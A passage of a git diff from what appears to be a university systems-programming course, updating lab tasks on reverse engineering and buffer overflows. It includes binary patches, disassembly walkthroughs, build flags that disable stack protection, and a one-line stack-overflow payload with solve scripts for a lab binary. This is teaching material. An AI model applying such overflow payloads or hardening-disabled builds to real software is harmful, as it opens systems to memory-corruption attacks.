zJ_f59t%hBl#YM#`n!2-_xPa8;y7P!QAad) ztV7^#pHzzwBuX98T-}r4-f@443qI{L8kgkmxCQiGA9UGz#M|Q$xLpG}Z@lY>NA;w5 zbZWctj-yXLR7Yyh: (...) -137: 83 7d 08 2a cmp dword ptr [ebp + 8], 42 -13b: 75 0d jne 0x14a -13d: 80 7d f4 58 cmp byte ptr [ebp - 12], 88 -141: 75 07 jne 0x14a -143: e8 b8 fe ff ff call 0x0 +149: 83 7d fc 2a cmp DWORD PTR [rbp-0x4],0x2a +14d: 75 0d jne 15c +14f: 80 7d f8 58 cmp BYTE PTR [rbp-0x8],0x58 +153: 75 07 jne 15c +155: e8 a6 fe ff ff call 0 ``` -The first `cmp` instruction at `0x137` compares the value at `[ebp + 8]` with `42`. -This implies that the first argument passed to the helper() function is expected to be `42`. -The second `cmp` instruction at `0x13d` compares the value at `[ebp - 12]` with `88`. -Since it's comparing a single byte (`byte ptr`), we can infer that this corresponds to a `char` argument. -Although it appears to be a local variable, if we look around a bit, we will notice why that is: - -```asm -131: 8b 45 0c mov eax, dword ptr [ebp + 12] -134: 88 45 f4 mov byte ptr [ebp - 12], al -``` - -The value at `[ebp + 12]` is moved into the `eax` register - this corresponds to the second argument passed to the `helper` function. -The lower byte of `eax`, `al`, the `char` that we are interested in, is then moved into a local variable. +The first 'cmp' instruction at '0x149' compares the value at '[rbp - 0x4]' with '0x2a'. +This implies that the first argument passed to the helper() function is expected to be '0x2a'. +The second 'cmp' instruction at '0x14f' compares the value at '[rbp - 0x8]' with '0x58'. +Since it's comparing a single byte ('byte ptr'), we can infer that this corresponds to a 'char' argument. If both of the aforementioned comparisons are successful, the `get_flag()` function is called. Hence, we can infer that we need to call the `helper()` function using the two arguments above - the integer `44`, and the char `X`, which is `88` in decimal. diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-2/support/link2 b/labs/lab-12/tasks/hidden-in-plain-sight-2/support/link2 index 5194748966495db6286b219d94d17376f126eb45..8cd6a122988d5d0f07635a7609984173cbcd8e65 100755 GIT binary patch literal 5600 zcmd5_W_=8_U(Cr%sW%oLK}yOt%Zc8Mgl2Pm6tqJk=i^oN|Q>#qAKO`VA?*QKB1PXZi3V{eW59;`~PRo zS&t8kDzz{Dr9J2WzyEqJbI#c_@k7t3ib4b_WDi-A1WHJ_V~HPP>=0Q+y2;-|Pkb?! zsQ&T!#Pq%GSL1gm=&r_ZZiX&#HGUf{ug33r-2!%>ENFxVro|M>%e66fPL6VufaES`{}6X>Fi+%O#B&bO-eQ%so%zXLh z0vKT31`#0uF&R{g+1#mYXzvPYeQWwUl@(1Ls|ac7#>7D{FCjt58id8qwCqg-(v;^bd7CtQ*>-HA-W z$da5{D4RCP8g|minuHlwEGM6}%ybyNmSQY}^UOPyGi*}BnPeMQdcyYH(0~84W8vZ0 zU^o_w4n((vBgJh4(6|-L+?_Qo)6SV+H8p(p`fYLKh6$~dQobn|L6se3)CSYc}6QxYX zFHjV<3}hgT1L2jHH82 zB-XFHhI8D}bNO`Iv?6&cQZ5+KLY+A`(yu$ELdAvA{$G?(acn(rr3#g_Nputn`J|pr zrF2;6iERTBn61jmNY<+8u~^NJPa*FdH=QpoUgV!0K* zxgxO&6JxLS_eZx3Y~nCG%kjy9-z;oLJQ^rYg6C?e9>XR z)}jK4oy+m|jyKiew#N9hrfpQf%Ci|_7W}{$HU*~Un))3c8V%%ci}kdccbYt;(%2}L z!+6N4K6`P8pp`~y_t7#ZO*$HdQX_Es)*;Qi-X79u-VL@4?*z&B#H;DxQmKpgJpx}3 z_zD=87>~G6#dlUa#Q5jOj~;f;@pFyk#`s7$GO^|;4`Ks^djVe^58%axbO=Ep#L-9K z(+C2|_)QOf2;afYEN=i+cLGyidYk;bJ_OB%HnF0Q;$gyIj5{;dx%? zf`osW%YWfLn&G;L@8EInC+1nK-+GP(DWNZ?|9Nz|Dt!g~gK*Y^6H;B2#CL|yZwOQLDR zHApn+I3#M9Jb`J`X0no<$Xl5b*f8EmCT(*P%+Q%ba9C#H-+&*3OV<=GkWa7(PcS)E zDi%$607Wf$i$&oojj+cSm*FOl!Yd7)lkOCcYvv|0wox?s1pJR(82oW=#l8~ZhBzZX z@A+~GGqMJ_2KWut5RbWt8wlt!YYABiJ^JF=gM{}M67EC9@yzzqkK{yLDZ}`;1Y`cU z{xR^ynEpKkBKZkVltaNsqJ9D4K9_4kT@Mdya z0AO-VfXMrNLT;nrBiZ&C=wuAdt5_7!7O$(dvh6r%>eb)D4{qU)_2c;?*Z*z6k5ek=KMfe>7j**5XqF$YWvMtJivAo}*Yj8S<$hck^0-12 z{l!Q47kHt#zx^cqME?#b1@E`JC)5^z7?vvUf8ienouA~e*FcH+W&aPk;VXV; z;AQ_`09J4PdP1I~SQlJBe1i%99#362H>!I0Bkc&EoW}seBT4p0Gx_WQh~)VB^%M#| VlIOY;boKlby#C+#e36y?{|$V-?dSji literal 5124 zcma)9du$xV8K1qo_1*e$ew_0#rf^Xm^5X7n$B9iI#Ccp|Cuv^TX#j`I-re5aD)-Xv z-X-B7XiN}SHx;QWD%7BYM5R_u+ke`kmi`eZ4GBV3169>hQPo0#Ofi(IQA;VR`}<~R zFPl(_j=lSv@B4o9&3xa?&dfa;-@RRuB<2)}dD(S|v0t{?mH`gS*#g$d#%u4~Gdb6D zIX){xdpZ8*N)B%m<#PO*4IdFq&Nb&|y^PI%IzK-@`Kz{CeCEBEZT;!^oBQhO>0e|s znN01LhWiTJ~uT!SGzhreMKa!^6bEo&s z*T&~gov+MHjej&1e_OiR`ZG2;E7hi_#%HI%fj_vNp6!w@OuqFfcmHbN#haYf{s(J% zDt_(sKB+c-t#)B5J|kW2d$sn*C);?x*SmWBeCw%Yh;eHC8Ydx0_@1xKI3YeYb@U!O+FG>S!sFfk!y!4{@L&UXMXtrHMaMw{`6q`J$+4E{jColY%CAP^GbPa z>{#URE!$hmJ*&ndg@%P+F7GPse`L{)u4NlrW5?JoO)G~jNZht@cDUvfq%jO zH+_A9^{^>_g~hkpPo9|)AYrZYBLd|OdJl3Tp!^wJ-w+p?l`RzYU0i5WPQ#mT9Tz&4 z84}iWVX^WUIoQC3Ta|y1u#pR49RCvTg%uw40o`q{#TJCy|_Y+E=6=v5Yw zgYBL7K^Rb8BVmM(dPsSdyp3{UgR+c-olTUFVZ}qjmpXPq*rx0yZ+lwrg|JS(Y%=R$loQR!J+|ZKoeF^;`YW}8|vuRQN0nCVp{Tek%`ggDeZ+_&_ zJjE)e5zFhzST>c49UoeoSUV6gv~*6jB6+=7IUXB|>BUsOlGYff3L%!%E%URQn02Cz zNpmwX61{jdnxb)-RywU^qB%NZITKZ^0MjxmDJ!vkbaxyItbyw_w9rdXA};fUna~U) zubY*eM6j$+A~DDdXRBw=Df$ zm*tn_AoKX7jO@);W$Eu8+!&-pqLj%bES4DEn=mvrohVxdOQdqDUSy{JpaxS+J6rI?`2)=*37m4@VJG&*rR1 zf6Of9E0$g=vV@s~$7ChL`voSFs;RMjshAD(SEYzHMJ*ksQzwzYd+h*?GF3`zsjB5- z5(U`2> zCr_=;qqRrFlS#wX(^?{}S}LH zFF%0k9Z@Y?AL;L35snmA_v2+%irU7khS>EKMAb;;HsTA9tQ`nPvf)UkSc>c$-D+1b zW2vK&vQe_MlvOgAy#}a%d%-x%ny)Wf3!FFujx-PsNL9h7yh_NTqHh>~Mcz{U{2c+(1pYKWR zGGXXwccen6726yPobqgGk+)5Hz5UXqi{O!cSlH0Z4<6_G&_UxD-);TFE~t5YEzD4h>4d?`6`UO6 z3*o*c{ES)+A07;CCn21k68O5n2;~L?I}9X#Qpl7Y2?=Z_MCdejLb_xU;v{Ag&WI(1 zjf~wP^aBFd3)~@akHB$(69Vb@B7c^^lLBi3zb^2sz~=@2RNw`HzY+MR!1n~wt(yFM zDL!DEz%K|~DR59A-7kr^Um%_EBp(%cT;M5z-w^m6f#(GNT;R(B>6%M^W(0m9@DqW4 z20+$Gk3Zz>s*+&HK6L?JENrBG_{IS571YQ>Sp+LHWlRvs~(>$&sgxoLWjY8fn z@P2{E1U?~o|AWhER9MaUO9j z2bbcYb>PG?;%b8``yuv~E>{Om^}d^UFT+Wg8i?ZX4nlVKJB$5{_DAZM^iID8)SWh{ zvUlN+_A{qARUHbqzmMUM@=5;i3Do_aK%Lr99;u9gwEw2Oko|EyZr(F+5~T*Bkd2g;Lv?4~u7Ec|22q@Odls@g4oZrX7eXg5ZeQf02b+2?l=!j4Pc7mR gpM1H(V`G@#RnR$w{7|8@z|Ctz;~#K~{c?E!1(%?ET>t<8 diff --git a/labs/lab-12/tasks/indirect-business/README.md b/labs/lab-12/tasks/indirect-business/README.md index d412c0513..2069f8e8e 100644 --- a/labs/lab-12/tasks/indirect-business/README.md +++ b/labs/lab-12/tasks/indirect-business/README.md @@ -12,19 +12,3 @@ Use the input to alter the data in your favor. If you experience a neural buffer overflow, take a look at the [relevant lab](https://cs-pub-ro.github.io/hardware-software-interface/Lab%2011%20-%20Buffer%20Management.%20Buffer%20Overflow/) and at [online examples](https://medium.com/@0x-Singularity/exploit-tutorial-understanding-buffer-overflows-d017108edc85). If that still doesn't work, keep in mind that the great cybersecurity expert named Sun Tzu was a big proponent of bruteforce attacks. - -## Checker - -To test the implementation, enter the `tests/` directory and run: - -```console -make check -``` - -In case of a correct solution, you will get an output such as: - -```text -test_payload ........................ passed ... 100 - -Total: 100/100 -``` diff --git a/labs/lab-12/tasks/indirect-business/solution/Makefile b/labs/lab-12/tasks/indirect-business/solution/Makefile index 5a06169a6..6da647f54 100644 --- a/labs/lab-12/tasks/indirect-business/solution/Makefile +++ b/labs/lab-12/tasks/indirect-business/solution/Makefile @@ -1,6 +1,6 @@ CC = gcc -CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector -LDFLAGS = -no-pie -m32 +CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector +LDFLAGS = -no-pie -m64 SRC_DIR = . TARGET = buff-ovf OBJ = buff-ovf.o @@ -8,10 +8,10 @@ OBJ = buff-ovf.o all: $(TARGET) obfuscator: $(SRC_DIR)/obfuscator.c - $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall + $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall deobfuscator: $(SRC_DIR)/deobfuscator.c - $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall + $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall $(TARGET): $(OBJ) $(CC) $(LDFLAGS) $(OBJ) -o $(TARGET) diff --git a/labs/lab-12/tasks/indirect-business/solution/README.md b/labs/lab-12/tasks/indirect-business/solution/README.md index 5bdfca3e9..eb5c3485e 100644 --- a/labs/lab-12/tasks/indirect-business/solution/README.md +++ b/labs/lab-12/tasks/indirect-business/solution/README.md @@ -8,6 +8,16 @@ parent: 'Task: Indirect Business' Use the buffer overflow to overwrite a string on the stack. This is going to be copied to a global variable that is checked before calling the `get_flag()` function. +Check the code from ./buff-ovf with GDB: +``` + char local_buff[10]; + char message[10]; + + fgets(message, 20, stdin); + strcpy(buff, local_buff); +``` +By analysing the code we can see that string "message" is 10 bytes long, but we are reading 20 bytes from stdin. By overflowing the buffer we can overwrite the "local_buff" variable with a string. + ```sh python3 -c 'import sys; sys.stdout.buffer.write(b"A"*10 + b"Bye")' | ./buff-ovf ``` diff --git a/labs/lab-12/tasks/indirect-business/solution/exploit.sh b/labs/lab-12/tasks/indirect-business/solution/exploit.sh deleted file mode 100755 index 61019235f..000000000 --- a/labs/lab-12/tasks/indirect-business/solution/exploit.sh +++ /dev/null @@ -1,11 +0,0 @@ -#!/bin/bash -# SPDX-License-Identifier: BSD-3-Clause - - -# TODO set the right string - -payload="AAAAAAAAAABye" - -# Print payload for redirect - -echo -ne "$payload" diff --git a/labs/lab-12/tasks/indirect-business/solution/solve.sh b/labs/lab-12/tasks/indirect-business/solution/solve.sh index 9567020aa..e81642d69 100755 --- a/labs/lab-12/tasks/indirect-business/solution/solve.sh +++ b/labs/lab-12/tasks/indirect-business/solution/solve.sh @@ -1,3 +1,2 @@ #!/bin/bash - python3 -c 'import sys; sys.stdout.buffer.write(b"A"*10 + b"Bye")' | ./buff-ovf diff --git a/labs/lab-12/tasks/indirect-business/support/buff-ovf b/labs/lab-12/tasks/indirect-business/support/buff-ovf index 7f37ef92a89d755b408b042cd7429b3f99380e10..cc94ca7b4e7d8315eece66137d39e58f15f81e65 100755 GIT binary patch literal 19592 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 ayxw7)>t$K&$Y$05=RR8^=TLBv;=ch|1CCe# literal 19560 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 g@|m **TIP:** GDB is your friend. -If you're unable to progress in this exercise, reference [the GDB lab](https://cs-pub-ro.github.io/hardware-software-interface/Lab%202%20-%20Memory%20Operations.%20Introduction%20to%20GDB/Introduction%20to%20GDB/Reading/) and [this](https://stackoverflow.com/questions/5429137/how-to-print-register-values-in-gdb). +If you're unable to progress in this exercise, reference [the GDB lab](https://cs-pub-ro.github.io/hardware-software-interface/labs/lab-02/reading/introduction-to-GDB.html) and [this](https://stackoverflow.com/questions/13282176/using-gdb-to-check-registers-values/13282633). diff --git a/labs/lab-12/tasks/look-at-him-go/solution/.gdb_history b/labs/lab-12/tasks/look-at-him-go/solution/.gdb_history new file mode 100644 index 000000000..929a28dc2 --- /dev/null +++ b/labs/lab-12/tasks/look-at-him-go/solution/.gdb_history @@ -0,0 +1,9 @@ +lay n +b main +run +n +lay n +tui disable +run +n +q diff --git a/labs/lab-12/tasks/look-at-him-go/solution/Makefile b/labs/lab-12/tasks/look-at-him-go/solution/Makefile index 